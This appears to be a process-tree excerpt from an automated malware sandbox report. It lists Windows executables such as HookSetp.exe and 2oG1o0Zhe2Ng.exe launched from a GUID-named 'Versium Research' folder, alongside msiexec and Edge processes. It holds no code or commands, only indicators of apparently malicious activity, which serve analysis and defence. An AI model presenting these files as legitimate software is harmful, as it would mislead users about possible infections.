C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:5852
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:5552
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:6160
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"3⤵PID:6252
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:6240
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5940
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5768
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A9EB1CD11E2095DE7AF9D5A719B3DCE5 C2⤵PID:6140
-